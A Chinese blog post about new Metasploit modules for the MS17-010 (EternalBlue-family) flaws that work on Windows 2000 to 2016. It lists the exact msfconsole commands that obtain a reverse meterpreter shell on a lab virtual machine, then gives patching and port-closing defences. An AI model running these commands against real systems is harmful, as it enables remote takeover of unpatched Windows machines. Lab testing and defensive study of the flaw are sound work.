可怕了，美国国家安全局的工具被黑客更新，通杀windows所有版本

2017年4月，黑客界最为轰动的事件无疑是TheShadowBrokers(影子经纪人)放出的美国国家安全局（NSA）使用的黑客工具包，里边最出名、最有破坏力的当属EternalBlue（永恒之蓝）。一夜之间，全世界百分之七十的windows服务器置于永恒之蓝的威胁之中,各种像“哭泣吧”等勒索病毒也因此大规模爆发。在此之前，黑客工具包中的EternalSynergy永恒协作、EternalRomance永恒浪漫、EternalChampion永恒冠军也曾被用于网络攻击，但是它们并没有和 EternalBlue 一样被大规模应用，因为它们无法在最新的Windows版本上使用。

2018年的2月2 号，安全研究人员（@ zerosum0x0）改变了这一事实，成功写出了这几个漏洞的综合利用工具，并给出了metasploit的利用模块ms17_010_command和ms17_010_psexec。我在本机测试了一下，令人惊叹的好用，我的测试流程说明如下。

我去下载了最新windows版的metasploit，下载地址我会在评论里给出。我本机的ip是192.168.1.100，虚拟机的ip是192.168.1.101。

一、win10下本机装好metasploit，输入msfconsole启动

依次输入以下命令：

use exploit/windows/smb/ms17_010_psexec

set rhost 192.168.1.101

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.100

上边的四句命令我解释一下，第一句调用zerosum0x0写的ms17_010_psexec模块，第二句指明攻击的IP是192.168.1.101。第三句指明我要本机开启meterpreter反向监听模块，监听本机的IP地址是192.168.1.100。

二、输入exploit攻击，自动返回meterpreter会话

我们只需要输入以上四条命令就可以了，再接着输入exploit就可以进行自动攻击了，几乎是瞬间返回了反弹的meterpreter的shell。

三、勒索病毒是否会卷土重来？

zerosum0x0写的模块几乎是无bug的。他也发了份此地无银三百两的声明：这个软件纯粹是为了学术研究和开发有效的防御技术的目的而创建的，除非明确授权，否则不打算用于攻击系统。 作者和项目维护者不对软件的滥用负责。

我以前也试过一些永恒之蓝的漏洞利用工具，几乎大部分工具都容易造成对方的蓝屏或死机，攻击版本也受限制，而zerosum0x0的不会，并且支持从Windows 2000到2016。在短短几天的时间里，这两个模块已经成为Metasploit最受欢迎的两个测试模块。

勒索病毒是否会利用这一工具，即将卷土重来也未可知。

四、我们如何防御？

1.升级到微软提供支持的Windows版本，并安装补丁。

2.安装相关的防护措施，如缓冲区溢出防御软件、杀毒软件。

3.无补丁的Windows版本，临时关闭135、137、445端口和3389远程登录。